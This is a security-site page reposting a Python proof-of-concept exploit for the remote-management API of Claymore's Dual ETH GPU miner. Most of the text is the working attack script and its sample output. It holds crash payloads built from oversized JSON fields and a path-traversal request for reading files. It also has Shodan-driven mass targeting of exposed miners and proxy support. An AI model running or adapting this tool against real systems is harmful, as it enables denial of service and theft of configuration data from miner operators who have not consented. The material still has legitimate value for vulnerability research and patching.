首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Claymore Dual ETH + DCR/SC/LBC/PASC GPU Miner - Stack Buffer Overflow / Path Tra
来源:github.com/tintinweb 作者:tintinweb 发布时间:2017-12-07  
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# github.com/tintinweb
#
#
# optional: pip install pysocks (https://pypi.python.org/pypi/PySocks)
#
#
'''
 
API overview:
    # >nc -L -p 3333
    {"id":0,"jsonrpc":"2.0","method":"miner_getstat1"}
    {"id":0,"jsonrpc":"2.0","method":"miner_file","params":["epools.txt","<encoded>"]}
    {"id":0,"jsonrpc":"2.0","method":"miner_getfile","params":["config.txt"]}
    {"id":0,"jsonrpc":"2.0","method":"miner_restart"}
    {"id":0,"jsonrpc":"2.0","method":"miner_reboot"}
    {"id":0,"jsonrpc":"2.0","method":"control_gpu","params":["0", "1"]}
    {"id":0,"jsonrpc":"2.0","method":"control_gpu","params":["-1", "0"]}
    {"id":0,"jsonrpc":"2.0","method":"control_gpu","params":["0", "2"]}
    {"id":0,"jsonrpc":"2.0","method":"miner_file","params":["config.txt","<encoded>"]}
    {"id":0,"jsonrpc":"2.0","method":"miner_file","params":["dpools.txt","<encoded>"]}
 
 
Exec:
    #> EthDcrMiner64.exe -epool http://192.168.0.1:8545 -mport -3333
 
    ╔════════════════════════════════════════════════════════════════╗
    ║     Claymore's Dual ETH + DCR/SC/LBC/PASC GPU Miner v10.0      ║
    ╚════════════════════════════════════════════════════════════════╝
 
    ...
    Total cards: 1
    ETH - connecting to 192.168.0.1:8545
    DUAL MINING MODE ENABLED: ETHEREUM+DECRED
     DCR: Stratum - connecting to 'pasc-eu2.nanopool.org' <213.32.29.168> port 15555
    ETH: HTTP SOLO mode
    Ethereum HTTP requests time (-etht) is set to 200 ms
    Watchdog enabled
    Remote management (READ-ONLY MODE) is enabled on port 3333
 
     DCR: Stratum - Connected (pasc-eu2.nanopool.org:15555)
     DCR: Authorized
     DCR: 11/22/17-22:05:12 - New job from pasc-eu2.nanopool.org:15555
 
    ... <run poc.py --vector=method <target>>
 
    GPU0 t=57C fan=0%
    Remote management: unknown command miner_getstat1 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    .... <crash>
 
 
PoC:
    #> poc.py 127.0.0.1:3333
    [poc.py -             <module>() ][    INFO] --start--
    [poc.py -             <module>() ][    INFO] # Claymore's Dual ETH + DCR/SC/LBC/PASC GPU Miner - Remote Buffer Overwrite
    [poc.py -             <module>() ][    INFO] # github.com/tintinweb
    [poc.py -         iter_targets() ][ WARNING] shodan apikey missing! shodan support disabled.
    [poc.py -             <module>() ][    INFO] [i] Target: 127.0.0.1:3333
    [poc.py -             <module>() ][    INFO] [+] connected.
    [poc.py -             <module>() ][    INFO] [+] peer disappeared. vulnerable!
    [poc.py -             <module>() ][ WARNING] error(10054, 'Eine vorhandene Verbindung wurde vom Remotehost geschlossen')
    [poc.py -             <module>() ][    INFO] --done--
 
 
'''
 
import logging
import json
import time
import argparse
import socket
try:
    import socks
except ImportError:
    print "!! cannot import socks. no socks support!"
    socks = None
try:
    import shodan
except ImportError:
    print "!! cannot import shodan. no shodan support!"
    shodan = None
 
LOGGER = logging.getLogger(__name__)
 
class MinerRpc(object):
    """
    Generic MinerRpc class with socks support
    """
 
    def __init__(self):
        self.sock = None
 
    def connect(self, host, port, proxy=None, timeout=15):
        if socks:
            self.sock = socks.socksocket()
        else:
            self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.settimeout(timeout)
        if proxy:
            if not socks:
                raise Exception("socks support disabled due to unmet dependency. please install pysocks")
            self.sock.set_proxy(*proxy)
        return self.sock.connect((host, port))
 
    def sendRcv(self, msg, chunksize=4096):
        self.sock.sendall(msg)
        chunks = []
        chunk = None
        #time.sleep(2)
        while chunk is None or len(chunk)==chunksize:
            chunk = self.sock.recv(chunksize)
            chunks.append(chunk)
        return "".join(chunks)
 
    def sendRcvTimed(self, msg, chunksize=1):
        self.sock.sendall(msg)
        start = time.time()
        resp = self.sock.recv(chunksize)
        diff = time.time()-start
        return diff, resp
 
 
class Utils:
    """
    Utility namespace
    """
 
    @staticmethod
    def iter_targets(targets, shodan_apikey):
        shodan_api = None
        if not shodan:
            LOGGER.warning(
                "[i] starting without shodan support. please pip install shodan to use shodan search strings.")
        else:
            if not shodan_apikey:
                LOGGER.warning("shodan apikey missing! shodan support disabled.")
            else:
                shodan_api = shodan.Shodan(shodan_apikey)
 
        for target in targets:
            if target.startswith("shodan://"):
                target = target.replace("shodan://", "")
                if shodan_api:
                    for t in shodan_api.search(target)['matches']:
                        yield t['ip_str'], t['port']
            else:
                host,port = target.strip().split(":")
                yield host,int(port)
 
 
VECTORS = {
    # Vector: extrafield
    # Description: overly long value for field. overly long overall msg
    # Result: crashes always, even though
    #   * password required
    #   * readonly mode (-<port>)
    "extrafield" : {"id": 1,
                     "jsonrpc": "2.0",
                     "lol": "a" * 145000,  ##<<--
                     "method": "miner_getstat1 ", },
    # Vector: psw (basically same as extrafield)
    # Description: overly long value for psw. overly long overall msg
    # Result: crashes always, even though
    #   * password required
    #   * readonly mode (-<port>)
    "psw" : { "id": 1,
              "psw":"d"*145000,  ##<<--
              "jsonrpc": "2.0",
              "method": "miner_getstat1", },
    # Vector: method
    # Description: overly long value for field. overly long overall msg
    # Result: crashes always, even though
    #   * readonly mode (-<port>)
    "method" : {"id": 1,
                     "jsonrpc": "2.0",
                     "method": "miner_getstat1 " + "a" * (16384 - 50 - 15 - 5), },  ##<<--
    # Vector: traversal
    # Description: path traversal
    # Result: retrieves any file
    "traversal": {"id":0,
             "jsonrpc":"2.0",
             "method":"miner_getfile",
             "params":["../Claymore.s.Dual.Ethereum.Decred_Siacoin_Lbry_Pascal.AMD.NVIDIA.GPU.Miner.v10.0/config.txt"]}, ##<<-- adjust path
 
 
}
 
if __name__ == "__main__":
    logging.basicConfig(format='[%(filename)s - %(funcName)20s() ][%(levelname)8s] %(message)s',
                        loglevel=logging.DEBUG)
    LOGGER.setLevel(logging.DEBUG)
 
    usage = """poc.py [options]
 
                  example: poc.py [options] <target> [<target>, ...]
 
                  options:
                           apikey       ... optional shodan apikey
                           vector       ... method ... overflow in method, requires password if set [readonly]
                                            extrafield  ... overflow in non-standard field [readonly, passwd mode]
                                            psw ... overflow in password
                                            traversal ... relative path traversal [authenticated]
 
                  target   ... IP, FQDN or shodan://<search string>
 
                           #> poc.py 1.1.1.1
                           #> poc.py 1.2.3.4 "shodan://product:eth+result"
               """
 
    parser = argparse.ArgumentParser(usage=usage)
    parser.add_argument("-a", "--apikey",
                        dest="apikey", default=None,
                        help="shodan.io apikey, NotSet=disabled [default: None]")
    parser.add_argument("-m", "--vector",
                        dest="vector", default="method",
                        help="vulnerablevectors [default: method]")
    parser.add_argument("targets", nargs="+")
 
    options = parser.parse_args()
    LOGGER.info("--start--")
    LOGGER.info("# Claymore's Dual ETH + DCR/SC/LBC/PASC GPU Miner - Remote Buffer Overwrite")
    LOGGER.info("# github.com/tintinweb")
    m = MinerRpc()
 
    for ip, port in Utils.iter_targets(options.targets, options.apikey):
        LOGGER.info("[i] Target: %s:%s"%(ip, port))
 
        try:
            m.connect(ip, port, timeout=20)
            LOGGER.info("[+] connected.")
 
            resp = m.sendRcv(json.dumps(VECTORS[options.vector]))  # crash with readonly mode
 
            LOGGER.debug("<-- %d %r"%(len(resp), resp))
            if not len(resp):
                LOGGER.info("[+] did not receive a response. probably vulnerable.")
        except socket.error, e:
            if e[0]==10054:
                LOGGER.info("[+] peer disappeared. vulnerable!")
            LOGGER.warning(repr(e))
 
    LOGGER.info("--done--")
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Windows Defender - C
·Linux Kernel - DCCP Socket Use
·LaCie 5big Network 2.2.8 - Com
·LabF nfsAxe FTP Client 3.7 - B
·Polycom Shell HDX Series Trace
·Apple macOS 10.13.1 (High Sier
·Microsoft Office Equation Edit
·Apple macOS 10.13.1 (High Sier
·Claymore's Dual Miner 10.1 Sta
·MikroTik 6.40.5 ICMP - Denial
·Proxifier for Mac 2.19 - Local
·macOS XNU Kernel - Memory Disc
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved